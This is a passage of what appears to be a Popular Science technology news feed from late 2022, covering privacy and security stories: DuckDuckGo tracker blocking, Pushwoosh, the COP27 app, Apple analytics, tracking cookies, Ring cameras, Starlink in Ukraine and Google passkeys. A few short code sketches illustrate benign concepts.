Human rights advocacy groups such as Amnesty International have for years voiced concerns over FIFA’s 2010 decision to award the World Cup to Qatar, citing its history of migrant labor abuse, intensely discriminatory LGBTQ+ laws, and various other autocratic practices. The World Cup takes place between November 20 and December 18.

DuckDuckGo’s Android app will now protect your data from sneaky trackers https://www.popsci.com/technology/duckduckgo-app-tracking-protection-android/ Wed, 16 Nov 2022 17:00:00 +0000 https://www.popsci.com/?p=487725
DuckDuckGo illustration of App Tracking Protection feature blocking Google profile keywords
DuckDuckGo's campaign for online privacy continues. DuckDuckGo

The latest update opens up more privacy options to the world's most popular smartphone OS.

The post DuckDuckGo’s Android app will now protect your data from sneaky trackers appeared first on Popular Science.


The stalwart privacy advocates at DuckDuckGo just opened up one of their most promising online tools to the majority of the world’s smartphones. This morning, the company announced its popular App Tracking Protection beta feature is now available for all Android app users, alongside some updates and expansions to the existing tool. App Tracking Protection is a free component of DuckDuckGo’s Android app that helps users block third-party trackers in their phone’s various apps, allowing for more comprehensive privacy and fewer of those off-putting targeted ads for products you just searched for the other day.

[Related: DuckDuckGo’s private browser is now available to all Mac users.]

According to the company’s research, Android users have around 35 apps on their phones that collectively garner between 1,000 and 2,000 tracking attempts each day via surreptitious interactions with over 70 different tracking companies. These businesses, including giants like Google and Meta, compile detailed consumer profiles that include exact geolocations, email addresses, time zones, phone numbers, and travel patterns, as well as your smartphone’s make and model, screen resolution, language, and internet provider. These vast data portfolios are coveted by third-party advertisers, data brokers, and even governments, and are frequently sold to them at huge profit margins, resulting in a massive consumerist surveillance ecosystem built upon people’s most personal details.

Tools like App Tracking Protection, however, provide a welcome barrier to these invasive tactics; in this case, a local VPN connection ensures that your app data doesn’t even go to DuckDuckGo’s own remote servers, much less anyone else’s. DuckDuckGo on Android also provides a real-time review of the feature’s results, including which tracking networks are involved with each app, as well as the data they have a history of collecting. You can even get automatically generated summaries if notifications are enabled.
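Conceptually, on-device blocking of this sort intercepts each outbound connection locally and refuses those destined for known tracker domains, so the data never leaves the phone. A simplified Python sketch of the matching step (the blocklist entries are illustrative; DuckDuckGo’s actual implementation runs inside Android’s VPN interface and uses far larger curated lists):

```python
# Illustrative tracker blocklist; real lists contain thousands of domains.
TRACKER_DOMAINS = {"graph.facebook.com", "app-measurement.com", "branch.io"}

def is_blocked(host):
    """Match the host itself and any of its subdomains against the list."""
    parts = host.lower().split(".")
    # Check "cdn.app-measurement.com", then "app-measurement.com", then "com".
    return any(".".join(parts[i:]) in TRACKER_DOMAINS for i in range(len(parts)))

def filter_request(host):
    """Decide locally whether a request may leave the device."""
    return "blocked" if is_blocked(host) else "allowed"
```

Because the decision happens on the handset, the tool can both stop the tracking attempt and log it for the real-time reports described above.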

[Related: Anyone can now sign up for DuckDuckGo’s private email service.]

The Android App Tracking Protection beta rollout is the latest in a line of online privacy expansions available from DuckDuckGo, including a standalone browser for Mac users and an email service designed specifically to block hidden trackers. To activate the new feature, Android users simply need to open the Settings tab in their DuckDuckGo app, select App Tracking Protection under the More from DuckDuckGo section, and follow the subsequent onscreen instructions.

Russian code found in CDC and US Army apps, according to new report https://www.popsci.com/technology/pushwoosh-russian-code/ Tue, 15 Nov 2022 19:00:00 +0000 https://www.popsci.com/?p=487121
close-up of hand browsing iPad App Store screen with download options
Pushwoosh is based in the Siberian city of Novosibirsk, but claims otherwise. Deposit Photos

A new Reuters report claims that a Siberia-based company, Pushwoosh, misled clients about being based in the US.

The post Russian code found in CDC and US Army apps, according to new report appeared first on Popular Science.


The app software company Pushwoosh boasts an impressive roster of clients, including the Centers for Disease Control and Prevention (CDC), the UK’s Labour Party, and the US Army. It has offered coding and data processing support for over 8,000 apps, a venture that has allowed it to profile countless users’ activity according to the access granted it, although its official privacy policy states that it does not collect or store any sensitive information. However, Pushwoosh, which reports a $2.4 million revenue stream, doesn’t appear to be based in Washington, DC, per previous claims, or in California or Maryland, for that matter. In actuality, official documents point to Pushwoosh being located in the Russian city of Novosibirsk, in Siberia.

The findings come from an exclusive Reuters report published yesterday, which lays out how Pushwoosh’s activities are raising concerns for the company’s often high-profile customers overseeing troves of sensitive user information. Reuters does not claim that a breach of privacy has taken place, but does point to Russian intelligence agencies’ far-reaching authority and previous orders compelling companies to share their data with the government. “I am proud to be Russian and I would never hide this,” Pushwoosh’s founder, Max Konev, wrote to Reuters via email, adding that the company “has no connection with the Russian government of any kind.”

[Related: Egypt’s official COP27 app may be greenwashed spyware.]

According to Reuters, a deep dive into Pushwoosh’s online paper trail turned up a host of suspicious activity. The company listed multiple physical addresses across the US, one of which was simply a Maryland home owned by Konev’s friend, and a California address that doesn’t exist according to city officials. There were also omissions of its Russian ties in at least five annual financial filings, and at least two associated LinkedIn profiles that do not belong to real people. Konev claims the two accounts were created in 2018 by a marketing company he hired to boost social media sales, not to hide the company’s country of origin.

Although the investigation does not indicate Pushwoosh has actively engaged in malicious surveillance, its misleading stateside addresses and potential susceptibility to leaks or hacking could put it in violation of US Federal Trade Commission (FTC) rules, or be cause enough to trigger sanctions. Both the US Army and the CDC stated they have removed Pushwoosh software from their apps, although that likely affects only a fraction of the 2.3 billion devices the company claims are in its databases. Pushwoosh’s clients also include the National Rifle Association and the Union of European Football Associations, per Reuters‘ report. Google and Apple have yet to comment on the situation, apart from claims that users’ security and privacy are a “huge focus” of their operations.

Egypt’s official COP27 summit app may be the ‘cartoon super-villain’ of spyware https://www.popsci.com/technology/official-cop27-summit-app-spyware-egypt/ Thu, 10 Nov 2022 17:00:00 +0000 https://www.popsci.com/?p=486023
Smartphone displaying COP27 app logo
Think twice about downloading it. Sean Gallup/Getty Images

Officials say more than 5,000 attendees have downloaded the app requiring unprecedented access to personal data.

The post Egypt’s official COP27 summit app may be the ‘cartoon super-villain’ of spyware appeared first on Popular Science.


The United Nations’ 27th Conference of Parties (COP27) climate summit is currently underway in the Egyptian resort city of Sharm el-Sheikh. But the host country’s official event app appears to be an almost comically egregious piece of spyware, according to multiple reports.

According to security experts and attendees at the annual gathering of world government leaders, scientists, and environmental activists, the app’s permissions requirements grant local authorities an alarming amount of access to users’ smartphone data. Emails, photos, and even the ability to pinpoint geographic locations are among the details available to Egypt’s ministry of communications and information technology, alongside gateways to phones’ cameras, microphones, and Bluetooth capabilities.

[Read: COP27 climate goals: 1.5 degrees Celsius and beyond.]

“You can now download the official #COP27 mobile app but you must give your full name, email address, mobile number, nationality and passport number. Also you must enable location tracking,” Hossam Bahgat, leader of the Egyptian Initiative for Personal Rights, tweeted ahead of the summit last month, along with a screenshot of the app’s welcome page featuring a photo of Egyptian president, Abdel Fattah El-Sisi. Per the app’s own wording, the Egyptian government also “reserves the right to access customer accounts for technical and administrative purposes and for security reasons.”

Speaking with The Guardian earlier this week, the Electronic Frontier Foundation’s advocacy director, Gennie Gebhart, described Egypt’s COP27 smartphone offering as “a cartoon super-villain of an app,” explaining that the required permissions are “unnecessary” for the app’s operation, thus heavily suggesting the government is attempting to surveil summit attendees.

[Related: The past 8 years have been the hottest on human record.]

Since the 2011 uprising, the Egyptian government has worked to expand and maintain a vast digital law enforcement apparatus, which it uses to surveil citizens, political activists, and dissidents. Strategies include utilizing deep packet inspection, which grants authorities the ability to monitor any internet traffic within a network, and the online censoring of over 500 websites including the country’s only independent news source. Ahead of the COP27 summit, Egyptian authorities oversaw a series of mass arrests in an attempt to identify political activists. The country currently has over 65,000 jailed political prisoners.

Although cybersecurity teams aiding the world’s heads of state likely identified the egregious privacy loopholes in Egypt’s COP27 app, The Guardian notes it has already been downloaded at least 5,000 times by various attendees. It’s easy to envision the Egyptian government counting on these lapses in judgment as a way to keep tabs on perceived domestic and foreign threats. It’s as good a reminder as any that you should probably take a moment to reinforce your own online defenses against malicious actors.

How drones are helping monitor Kyrgyzstan’s radioactive legacy https://www.popsci.com/technology/kyrgyzstan-drone-radiation-monitoring/ Thu, 10 Nov 2022 12:00:00 +0000 https://www.popsci.com/?p=485897
Drones photo
Third Element Aviation

An accident in 1958 and more than two decades of uranium mining led to nuclear contamination. Now, airborne monitoring is helping.

The post How drones are helping monitor Kyrgyzstan’s radioactive legacy appeared first on Popular Science.


Above the town of Mailuu Suu in western Kyrgyzstan, the International Atomic Energy Agency is flying drones to monitor for radiation. For 22 years, from 1946 to 1968, people in Mailuu Suu mined and processed uranium ore for the Soviet Union. Decades later, waste still remains, and monitoring is essential to ensure that people can live safely in an environment contaminated by the production of nuclear materials. The drone flights, captured in a video shared online November 4, are a way for new technology to ease the burden of monitoring risk.

The town of Mailuu Suu was intimately tied to the extraction of nuclear material in the Soviet Union, which meant that the town was unlisted on maps, closed to outsiders, and officially logged only as “Mailbox 200.” In the Cold War climate, where espionage was essential for superpowers tracking and estimating the size of nuclear weapons arsenals, this made some degree of sense. It also meant that the protective geography of the town, in a river valley in a region prone to landslides and earthquakes, helped keep residents in place, even as it led to risky decisions like burying waste near the village.

An accident in 1958

In 1958, heavy rainfall and seismic activity caused a dam failure that pushed 14 million cubic feet of radioactive waste into the Maylu-Suu river that runs through the town. Downstream, the river flows into the Ferghana valley of Central Asia, an area split between Kyrgyzstan, Uzbekistan, and Tajikistan, and a region home to 14 million people. The 1958 disaster contaminated the river and areas downstream, leaving a visceral legacy in the memories of those who witnessed it.

The concern for the town, the government of Kyrgyzstan, and international observers, is that such a disaster could strike again. Much of the waste from the site exists in “tailings,” or the sludge left over from extracting uranium ore and processing it with chemicals. In addition to the 23 sites of tailings, there are 13 sites of radioactive rock around the city. Climate change can cause a shift in rain patterns and an increase in storm severity, exacerbating the risk posed by these sites to the whole region.

Eventually, remediation will be needed to tackle all of the sites, ensuring they no longer pose a threat to people in the area or elsewhere. Before that, there is the constant work of monitoring the waste, which has traditionally been done by humans on foot or, rarely, helicopters. Now, uncrewed aerial vehicles (UAVs), or drones, are being brought to bear on the problem.

“The tailor-made UAV-based gamma spectrometer will make it possible for experts to explore sites without the need to trek through difficult terrain with lots of gear,” Sven Altfelder, an IAEA remediation safety specialist, said in a June 2021 release. “By using the UAV to conduct monitoring duties, experts in the region will be able to easily gather the necessary data quickly, while avoiding potential physical and radiological risks altogether.”

A good job for a drone

Drone monitoring reduces the labor and risk of checking out the area on foot. Thanks to the ability of drone-borne sensors to carry and upload data, it also allows for a more complete picture of radioactive risk and sites, mapped in three dimensions by the flying robot.
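The aggregation step lends itself to a short sketch. The following is purely illustrative—the voxel size, readings, and function are invented for this example and are not the IAEA's actual processing pipeline. It averages georeferenced gamma count rates into cubic voxels to build a coarse 3D map:

```go
package main

import "fmt"

// A voxel indexes one cubic cell of the survey volume.
type voxel struct{ x, y, z int }

// gridMap averages gamma count rates (counts per second) into cubic
// voxels of the given edge length, turning a stream of georeferenced
// point readings {x, y, z, cps} into a coarse 3D radiation map.
func gridMap(readings [][4]float64, cell float64) map[voxel]float64 {
	sum := map[voxel]float64{}
	n := map[voxel]int{}
	for _, r := range readings {
		k := voxel{int(r[0] / cell), int(r[1] / cell), int(r[2] / cell)}
		sum[k] += r[3]
		n[k]++
	}
	for k := range sum {
		sum[k] /= float64(n[k])
	}
	return sum
}

func main() {
	readings := [][4]float64{
		{3, 4, 1, 120},  // two readings fall in the same 10 m voxel...
		{7, 2, 5, 80},
		{15, 4, 1, 300}, // ...and a hotter reading lands in a neighbor
	}
	m := gridMap(readings, 10)
	fmt.Println(m[voxel{0, 0, 0}], m[voxel{1, 0, 0}]) // 100 300
}
```

A real survey would also carry GPS uncertainty, altitude correction, and detector calibration; the point is only how flight data collapses into a map that can be compared between visits.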

Another perk is that drones can detect new or unmarked sites, since thorough scanning of the region by air makes it easier to find mislabeled or unknown waste sites. Drone piloting is also easier and cheaper than using crewed aircraft, and drone pilot training has fewer hurdles than that of pilots who actually fly inside the craft they operate.

The technology was tested in Germany in 2020, showing that the drone can produce a reliable and accurate radiation map of partially remediated sites. This work was funded by the European Union and the German government, which has a specific tie to Mailuu Suu. When the town was set up as a closed community in 1946, among the people relocated to work in it were ethnic Germans, alongside Crimean Tatars and Russian soldiers who had surrendered during World War II.

[Related: Why do nuclear power plants need electricity to stay safe?]

With proof that the drone can be used to successfully monitor the sites in Kyrgyzstan, the hope is that experts in the country, and other Central Asian countries, can be trained to take on the work. The project is supported by the governments of Kyrgyzstan, Kazakhstan, Uzbekistan, and Tajikistan.

“We will be able to use the results obtained by the UAV to explain remediation results to the local population and demonstrate that those areas are now safe,” said Azamat Mambetov, State Secretary of the Kyrgyzstan Ministry of Emergency Situations, in the June release.

The drone monitoring will aid in guiding remediation and proving its success. This, in turn, could expand possibilities in the region, with some hope from the IAEA that a remediated and safe Mailuu Suu could not just stop being a risk, but could even become a destination for travelers and tourists eager to behold the region’s natural beauty.

Apple knows exactly how much you use its apps https://www.popsci.com/technology/apple-privacy-app-study/ Wed, 09 Nov 2022 23:00:00 +0000 https://www.popsci.com/?p=485645
Interior of skylights of Apple Store on Fifth Avenue
The news isn't exactly surprising. Deposit Photos

New research reveals a startling level of data monitoring within the App Store and company apps like Books and Apple Music.

The post Apple knows exactly how much you use its apps appeared first on Popular Science.


Apple often boasts of its commitment to user privacy and data anonymization, and in many instances, the tech giant does provide ways for consumers to guard against invasive tactics like ad tracking. But as a new investigation reveals, courtesy of Gizmodo, that dedication largely stops where the company’s own apps are concerned. The new research, conducted by two security researchers at the software company Mysk, shows the level of scrutiny iPhone users receive while accessing official apps like Apple TV, Music, Books, and Stocks is both startlingly detailed and potentially worrisome.

[Related: Privacy changes dig into Meta’s profits.]

According to the report, Apple’s most popular native apps, including the App Store itself, track copious amounts of user data, regardless of whether or not iPhone owners toggle their iPhone Analytics privacy setting. When switched “on,” the iPhone Analytics tool supposedly will “disable the sharing of Device Analytics altogether,” per the company’s own words. Upon delving further, Gizmodo relays that Mysk “found the analytics control and other privacy settings had no obvious effect on Apple’s data collection—the tracking remained the same whether iPhone Analytics was switched on or off.”

When it comes to what Apple harvests, it’s probably simpler to list the things it doesn’t gather. According to Mysk’s research, the Big Tech giant logged information on “every single thing” you do in real time—what you tap on, what apps you search for, how long you looked at an app, and how you first discovered it. “The app sent details [to Apple] about you and your device as well, including ID numbers, what kind of phone you’re using, your screen resolution, your keyboard languages, how you’re connected to the internet,” explained Gizmodo, adding that this is the sort of information commonly utilized for device fingerprinting.

[Related: Keep tabs on how much access your computer’s apps have to your system.]

The breadth and detail of Apple’s data collection is extraordinary compared to other comparable online experiences—Mysk’s investigators cite Microsoft Edge and Google Chrome as two apps that don’t send any data to their parent companies when analytics are disabled.

There’s really no way to know for sure how much of this data Apple actually analyzes, and for what purposes. Still, it’s an incredibly important reminder of how few truly “private” spaces remain online, including those run by the company that once erected “Privacy. That’s iPhone.” billboards.

Instagram is down for some users—here’s what we know so far https://www.popsci.com/technology/instagram-outage-suspensions/ Mon, 31 Oct 2022 15:50:53 +0000 https://www.popsci.com/?p=482468
You are not alone. Deposit Photos

Another day, another case of social media chaos.

The post Instagram is down for some users—here’s what we know so far appeared first on Popular Science.


UPDATE (November 1, 2022): Instagram announced via Twitter it resolved the issue at approximately 6pm ET on 10/31, citing a “bug” which caused “people in different parts of the world to have issues accessing their accounts and caused a temporary change for some in number of followers.”

Twitter won the award last week for most chaotic social media platform—but Instagram may be pushing for the title today. Earlier this morning, Instagram confirmed via tweet that many users are experiencing accessibility issues in the form of seemingly random account suspensions. “We’re looking into it and apologize for the inconvenience,” the message concludes alongside the hashtag “#instagramdown.”

As The Verge notes, many prominent Instagram accounts’ follower totals have dropped precipitously, with the social media company’s official account down over a million followers since yesterday. Multiple users are taking to other social media platforms such as Twitter to detail their Instagram woes, usually alongside screenshots of their suspension notices, which appear to show the generic flagged-account page displayed when a profile is moderated. As of 10:19 a.m. EDT, 7,000 reports of issues with the app have popped up.

One PopSci staffer is experiencing the problem—their Instagram account was randomly and inexplicably suspended for roughly two to three hours before being restored, although they are still seeing app issues.

Instagram is owned by Mark Zuckerberg’s Meta, the same parent company as Facebook.

Booking a trip online? Here’s what tracking cookies could be gathering about your family. https://www.popsci.com/technology/mozilla-blog-tracking-cookies/ Mon, 24 Oct 2022 22:00:00 +0000 https://www.popsci.com/?p=480285
firefox browser on phone
DEPOSIT PHOTOS

A Mozilla product manager breaks down what cookies you might pick up just from booking a vacation.

The post Booking a trip online? Here’s what tracking cookies could be gathering about your family. appeared first on Popular Science.


In a blog post published today, Mozilla product manager Karen Kim detailed an experiment she conducted to see how many tracking cookies got installed in her browser when she researched a family trip for two adults and two children to Costa Rica. 

By visiting multiple flight, hotel, and car rental comparison sites, and using Google to find sightseeing information, guidance on traveling with children, and product recommendations, Kim picked up a total of 1,620 cookies—around 20 percent of which were third-party tracking cookies from analytics and ad companies like Google and Facebook. Kim concluded that there was something “insidious” about the whole situation, saying: “In the act of planning a trip online without anti-tracking protection, someone out there now knows about the ages of your children, your partner’s interests, which family scuba lesson you’ve booked and with whom.”

While some cookies are crucial for keeping modern websites operating, others are a bit more nefarious. Good cookies track things like your preferred language and the contents of your shopping cart, and keep you logged in when you browse around a site. No one really has any issues with these kinds of cookies—they are a necessary part of the modern web. Without them, all but the most basic websites would cease to function. 

Third-party tracking cookies, on the other hand, are the kind of cookies that privacy experts are most concerned about. Combined with other kinds of tracking, they allow companies and data brokers to create incredibly detailed profiles of your online activities. In Mozilla’s blog post, Kim said that the advertising companies would have been able to link together the age of her children, her partner’s interests, and the tours that she booked. In theory, the information would have been anonymous, as it would likely have been linked to a user ID rather than her name and address—but these anonymous profiles are startlingly easy to de-anonymize.
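The first-party/third-party distinction comes down to comparing a cookie's domain with the site you're visiting. Here's a deliberately simplified sketch of that classification; the domains are invented for the example, and real browsers match against the Public Suffix List rather than plain suffix matching:

```go
package main

import (
	"fmt"
	"strings"
)

// isThirdParty reports whether a cookie's domain belongs to a site
// other than the page being visited. This simplified check treats a
// cookie as first-party when its domain equals the page host or is a
// parent domain of it.
func isThirdParty(cookieDomain, pageHost string) bool {
	d := strings.TrimPrefix(cookieDomain, ".")
	return pageHost != d && !strings.HasSuffix(pageHost, "."+d)
}

func main() {
	// flights-example.com is a made-up stand-in for a booking site.
	page := "www.flights-example.com"
	for _, c := range []string{"flights-example.com", ".doubleclick.net", ".facebook.com"} {
		fmt.Println(c, isThirdParty(c, page))
	}
	// Output:
	// flights-example.com false
	// .doubleclick.net true
	// .facebook.com true
}
```

Anti-tracking browser modes effectively automate this classification, then block or silo whatever lands in the third-party bucket.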

Worse, though, is that the same companies could also have built profiles for her hypothetical kids. This process starts early. Period and fertility-tracking apps—which are currently under a lot of scrutiny due to Roe v. Wade being overturned in the US—essentially start collecting information about children before they are even born. As their parents search the web for answers to parenting questions, to book vacations, and everything else, that profile grows. Some companies are even gathering and selling data from children while they attend classes online. One pre-pandemic report found that by the time a child is 13, over 72 million pieces of personal data will have been collected on them. That figure is almost certainly higher now.

To counter this, Kim suggests using Firefox, which has Total Cookie Protection—a special browser mode that silos cookies to prevent third-party tracking cookies from following you around the web—enabled by default. However, most modern browsers now offer similar features. Safari blocks all cross-site tracking, including cookies, by default with a feature called Intelligent Tracking Prevention. Brave, Opera, and the new DuckDuckGo browser all use similar strategies to block third-party cookies while still allowing websites to function normally. Even Microsoft Edge has an option—but you will need to enable its stricter settings. The only real holdout is Google Chrome (unsurprisingly)—but even it is due to start blocking them next year.

Cookies as a tracking tool are on the way out. Soon enough, only users running old, obsolete browsers will still be trackable with them. The bigger problem, unfortunately, is that tracking continues to evolve. Soon, there might be a whole range of alternative tracking tools that will need to be avoided. In particular, first-party tracking by the websites you visit is very hard to prevent. And while you can block cookies, it’s impossible to stop Google from knowing everything you do across Google properties like Gmail and YouTube. If you are logged into your account, it can see every YouTube video you watch, every document you share, and what you search for.

Ring camera surveillance puts new pressure on Amazon gig workers https://www.popsci.com/technology/amazon-ring-camera-gig-workers/ Thu, 20 Oct 2022 20:00:00 +0000 https://www.popsci.com/?p=479732
Close up of Amazon Ring security camera mounted outside building
The report calls Amazon's ecosystem 'ingenious.' Deposit Photos

A new study from Data & Society details pervasive behavior among Ring owners towards delivery workers.

The post Ring camera surveillance puts new pressure on Amazon gig workers appeared first on Popular Science.


Amazon’s Ring security cameras are far and away the most popular home surveillance products on the market. For years, the commerce giant has involved the cameras in everything from police partnerships to family friendly television shows. But as a new report courtesy of research organization Data & Society details, the motivation goes far beyond mere profits—the Ring network serves as a de facto surveillance system for Amazon delivery drivers and gig workers by encouraging “boss behavior” in camera owners.

“[T]he technological advances of security cameras combined with social media networks encourage changes in customer behavior, constituting a new form of workplace management that extends beyond the familiar forms of workplace monitoring,” write co-authors Aiha Nguyen and Eve Zelickson.

Through interviews with both Ring camera owners and Amazon employees, Data & Society pinpointed a number of factors converging to create a new managerial class of citizen who, often unwittingly, provides free labor to the company. Much of this hinges on what the report’s authors dub “boss behavior,” or “a range of actions, often undertaken in the name of safety or package security, that also function as the direct management of delivery workers.”

[Related: ‘Ring Nation’ hits cable TV nationwide.]

As Motherboard explains in its analysis of the report, “Customers were… open about how the use of surveillance cameras encouraged them to penalize drivers more, whether by reporting them to Amazon, alerting law enforcement, or sharing footage online to shame them.”

This method is “ingenious,” write the authors. “Amazon has managed to transform what was once a labor cost (i.e., supervising work and asset protection) into a revenue stream through the sale of doorbell cameras and subscription services to residents who then perform the labor of securing their own doorstep,” they write in the report.

This unhealthy dynamic is only exacerbated by reported stressful and often dangerous working conditions experienced by full-time deliverers and gig employees enrolled in Amazon Flex, the company’s version of an on-demand gig labor force akin to Uber and DoorDash. Like other similar services, Flex bills itself as offering people a more customizable job via variable hours and pay schedules, alongside the ability to choose their own healthcare options via the open marketplace. The report notes, however, that interviews with Flex drivers made it clear that the supposed perks “have hidden costs: drivers often have to compete for shifts, spend hours trying to get reimbursed for lost wages, pay for wear and tear on their vehicle, and have no control over where they work.”

Speaking with PopSci, Ryan Gerety, Acting Director of the Amazon-focused labor and activist coalition Athena, says Data & Society’s report “confirms what workers, small businesses, and communities of color have long known: Amazon is not just an online store. It is a surveillance empire that fuels fear and mistrust,” adding the company is “turning everyday people into bosses and police” through its Ring camera systems.

The embrace of gig economics by many companies has had an effect on the American workforce. A Pew Research report from last year estimates that as much as 16 percent of Americans have earned some form of income from a gig platform. While many report positive experiences, a troubling number have cited issues including harassment, danger, and unwanted sexual advances. Roughly 42 percent of gig workers aged 18-29, for example, recounted instances in which they felt unsafe, with a quarter of respondents citing sexual harassment.

DuckDuckGo just made its privacy-centric browser available for all Mac users https://www.popsci.com/technology/duckduckgo-browser-mac/ Tue, 18 Oct 2022 15:00:00 +0000 https://www.popsci.com/?p=478789
DuckDuckGo browser displaying Duck Player YouTube video portal
'Duck Player' is a go. This is not a drill. DuckDuckGo

New additions to DuckDuckGo's open beta browser include Duck Player, which blocks YouTube ad trackers.

The post DuckDuckGo just made its privacy-centric browser available for all Mac users appeared first on Popular Science.


DuckDuckGo announced this morning that its privacy-centric web browser app is now officially available via open beta test to all Mac users. First debuted back in April, the default incognito browser was originally only available via a waitlisted closed beta, but now any Apple device owner can download the alternative option to try ahead of its official public rollout.

According to the official news release, DuckDuckGo for Mac’s built-in safeguards include the ability to block trackers before they even load, reportedly resulting in around 60 percent less data usage than Chrome. Other features include the requisite pop-up blockers and DuckDuckGo’s popular “Fire Button” shortcut, which can instantly clear your existing browser data.

[Related: 7 tips for using DuckDuckGo.]

Another major addition to “version 0.30” is Duck Player, an adorably named portal that guards users from cookies and targeted ad tracking while they stream YouTube content. According to DuckDuckGo, Duck Player sometimes prevented any ads from playing at all. Your views will still count toward YouTube’s overall viewership totals, but at least you don’t have to worry about all those personalized commercials. The browser now also includes bookmarks and pinned tabs, as well as a way to look at “locally stored” browsing history.

Back in August, DuckDuckGo opened up its beta email service to the public, which is designed to minimize companies’ email trackers that are often sneakily hidden within messages for targeted advertising purposes and profit. Apart from its actual utility, the fact that you can now get an email address ending in “@duck.com” is pretty great, in and of itself.

The curious among you can download the beta browser now, which can also port over all your existing bookmarks, as well as any passwords you’re comfortable having stored on DuckDuckGo’s native secure vault. There’s also the option to utilize its collaboration with the open-source manager, Bitwarden, or even 1Password‘s new universal autofill feature. Windows users aren’t forgotten, by the way—DuckDuckGo’s announcement today promises a private beta test for Team PC is “expected in the coming months,” so be on the lookout for that, too.

Update 10/18/22: This article has been updated to better reflect DuckDuckGo’s browser password features.

SpaceX says it can no longer fund Ukraine’s Starlink access https://www.popsci.com/technology/elon-musk-ukraine-starlink/ Fri, 14 Oct 2022 17:30:00 +0000 https://www.popsci.com/?p=477954
Two photos of Elon Musk on smartphone screens
Other reports indicate the decision may be more financially motivated. Deposit Photos

Following an exchange on Twitter, the move may put Ukrainian defense at risk.

The post SpaceX says it can no longer fund Ukraine’s Starlink access appeared first on Popular Science.


Elon Musk threatened to cut off Ukrainian armed forces’ funding for vital Starlink terminals on Friday morning, suggesting that he is “merely following [the] recommendation” of a Ukrainian diplomat’s recent Twitter reply. On October 3, the multibillionaire CEO of Tesla and SpaceX suggested the country cede the entirety of Crimea to Russia via multiple social media polls, prompting Andrij Melnyk, Ukraine’s ambassador to Germany, to tell Musk to, in so many words, back off.

Musk’s hint comes shortly after CNN relayed news this week that his satellite internet company recently informed the Pentagon it could no longer afford to continue offering aid to the nation, whose citizens have pushed back against invading Russian forces since February. Ukrainian military officials have repeatedly voiced their troops’ reliance on the satellite internet access.

[Related: Elon Musk offers to buy Twitter (again).]

Unlike other forms of communication, Starlink’s satellite internet allows Ukrainian forces to coordinate and remain connected across the country even without standard cellular data and ground internet infrastructures. Using the company’s (pricey) terminals and antennae, users instead rely on a network of thousands of orbital satellites—far from Russian weaponry—to ensure they not only stay online, but are able to coordinate campaigns like drone and artillery strikes. Without them, Ukraine is “really operating in the blind in many cases,” explained one policy expert, per CNN’s report.

Despite Musk’s implication that the tipping point for Starlink cutting services to Ukraine could be due to Melnyk’s retort, the decision may be far more related to finances than word choice. “Though Musk has received widespread acclaim and thanks for responding to requests for Starlink service to Ukraine right as the war was starting, in reality, the vast majority of the 20,000 terminals have received full or partial funding from outside sources,” CNN exclusively reported in its summary of a recent letter delivered to the Pentagon from SpaceX. The US government, the UK, and Poland have already funded a combined 85 percent of all terminals made available to the Ukrainian military, per SpaceX’s own figures as seen by CNN.

[Related: The shuffling Optimus robot revealed at Tesla’s AI Day.]

SpaceX estimates that an entire year’s worth of Starlink terminals and support would run Ukraine and its allies $380 million. Musk himself is worth an estimated $212 billion, and SpaceX is valued at $127 billion—$2 billion of which was raised this past year. The day after Musk’s Twitter polls, he offered to buy the social media platform once again for $44 billion, after attempting to back out of the acquisition earlier this year.

Google’s new passkey support is helping kill the password https://www.popsci.com/technology/google-enables-passkey-support/ Fri, 14 Oct 2022 16:31:21 +0000 https://www.popsci.com/?p=478059
Security photo
Deposit Photos / bennymarty

It's still in beta, but the tech is part of an important, larger initiative involving Apple and Microsoft, too.

The post Google’s new passkey support is helping kill the password appeared first on Popular Science.


Passwords are a pain. People use the same insecure passwords over and over again and yet still manage to forget them, which makes protecting accounts and data challenging for big tech companies. Even when someone does use a password that is long and complex enough to be relatively secure—because, say, they have a password manager—it is still vulnerable to social engineering attacks like phishing. All in all, passwords are a terrible system for protecting personal data, sensitive information, and your dog photos—which is why Apple, Google, Microsoft, and the rest of the FIDO Alliance are so keen to replace them with an approach called passkeys. And they’re doing it right now. 

This week, Google announced that it was bringing passkey support to Android and Chrome—or at least to their latest beta software. If you’re enrolled in the Google Play Services beta or the Chrome Canary channel, you will be able to use them right now to log in to websites that support them. Google says they will come to the stable releases later this year and that their next milestone for 2022 will be to release an API (an application programming interface) to allow native Android apps to support them. 

Google supporting passkeys in its products is a big step towards widespread adoption. Apple started supporting passkeys on the iPhone with iOS 16 and will support them on Macs later this year with macOS Ventura. Once Google adds them to Android and Chrome, the two most popular mobile platforms and the two most popular browsers will support them. That’s huge.

Passkeys use public key cryptography to create a more secure authentication protocol than passwords. When you sign up for a new account with a passkey, your device will create a pair of keys—a public key that is shared with the service and a private key that it stores securely locked behind your biometric data or a PIN. 

[Related: Apple’s passkeys could be better than passwords. Here’s how they’ll work.]

Because of the underlying math, the public key can be public, as its name implies. It doesn’t matter if the site gets hacked and it is released in a data breach or shared on social media, it isn’t enough to log in to your account. It only allows the website to verify that your device has the right private key saved. 

And the system is set up so that all user verification is handled by your device. This means your private key is never transmitted over the internet, which makes passkeys basically impossible to phish or steal. Instead, a temporary single-use token is sent that tells the website that you have the right private key. It’s really a great system. 

[Related: Apple, Google, and Microsoft team up for new password-free technology]

But perhaps the best thing about passkeys isn’t that they’re more secure, but that they’re much more convenient to use. In the blog post announcing passkey support, Google explains how you are able to create a passkey or log in to an account just using your fingerprint, face, or screen lock code—it’s literally two steps. You don’t have to worry about coming up with a long code or adding the requisite number of special symbols. And you don’t have to remember them either—they will automatically be synced in the background between your devices using Google Password Manager. Basically, the user experience will be like an autofilling password—but better and more reliable.

And, because passkeys are an industry standard, you will also be able to use your phone to log in to nearby devices regardless of what operating system they have. Say you need to print something using a friend’s Mac. You can log in to your Gmail account in Safari just by scanning a QR code on your Android phone. Really, the long sought-after passwordless future is coming soon—and it looks great.
